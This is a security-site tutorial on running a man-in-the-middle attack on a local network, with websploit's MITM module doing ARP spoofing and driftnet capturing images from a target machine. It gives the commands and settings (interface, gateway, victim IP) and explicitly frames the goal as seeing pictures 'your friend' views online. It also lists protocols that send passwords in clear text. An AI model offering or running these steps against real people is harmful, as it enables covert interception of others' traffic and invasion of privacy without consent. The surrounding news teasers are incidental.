Friday, February 21, 2025
HomeSniffing & SpoofingDriftnet - Tool used to Capture Images that Your Friend looking at...

Driftnet – Tool used to Capture Images that Your Friend looking at Online

Published on

SIEM as a Service

Follow Us on Google News

How we can launch a MITM attack with Websploit and the Driftnet – Tool used to capture images.

MITM attack is a type of cyber attack where the attacker intercepts communication between two parties.

Step 1: Need to install websploit in Kali if not present.

root@kali:~# apt-get install websploit

Step2: To Run the websploit

root@kali:~# websploit

Step 3: Next we need to list the modules with the websploit.

wsf > show modules

Driftnet - Tool used to capture images

Step 4: Need to select network/mitm under Network modules.

wsf > use network/mitm
wsf:MITM > show options

Driftnet - Tool used to capture images

Interface: Need to specify the network adapter interface based on our network adapter.

  • set Interface eth0
  • set Interface wlan0

Router: Need to specify Router IP, which can be found with the command route -n.

set Router (Gateway IP)

Target: The victim machine IP address, can be found with ipconfig for Windows and ifconfig for Linux.

Driftnet - Tool used to capture images

Step 5: All set now time to run the sniffer, once you run the sniffer IP Forwarding and ARP Spoofing occur after that sniffers will start up.

wsf:MITM > run

Driftnet - Tool used to capture images

Step 6: Now go down to the victim machine and start surfing, all the images would be captured by drifnet.

Driftnet - Tool used to capture images

Here you can find the pictures that your friend watching online.

Protocols Vulnerable to Sniffing

  • HTTP: Sends passwords in clear text
  • TELNET: Transfer commands in plain text
  • SNMP: Sends passwords in clear text
  • POP: Sends passwords in clear text
  • FTP: Sends passwords in clear text
  • NNTP: Sends passwords in clear text
  • IMAP: Sends passwords in clear text

If you have any doubt please don’t hesitate to leave a comment.

Also, find more Tutorials with Kali Linux

Gurubaran
Gurubaran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Latest articles

SPAWNCHIMERA Malware Exploits Ivanti Buffer Overflow Vulnerability by Applying a Critical Fix

In a recent development, the SPAWNCHIMERA malware family has been identified exploiting the buffer...

Sitevision Auto-Generated Password Vulnerability Lets Hackers Steal Signing Key

A significant vulnerability in Sitevision CMS, versions 10.3.1 and earlier, has been identified, allowing...

NSA Allegedly Hacked Northwestern Polytechnical University, China Claims

Chinese cybersecurity entities have accused the U.S. National Security Agency (NSA) of orchestrating a...

ACRStealer Malware Abuses Google Docs as C2 to Steal Login Credentials

The ACRStealer malware, an infostealer disguised as illegal software such as cracks and keygens,...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

Tor Network Suffers IP Spoofing Attack Via Non-Exit Relays

In late October 2024, a coordinated IP spoofing attack targeted the Tor network, prompting...

10 Most Common Types of Cyber Attacks in 2023

Cyber attacks are evolving rapidly with advancements in technology, as threat actors exploit new...

Sniffing as easy as possible with Ettercap Tool

Sniffing includes catching, translating, inspecting, and interpreting the data inside a network packet on...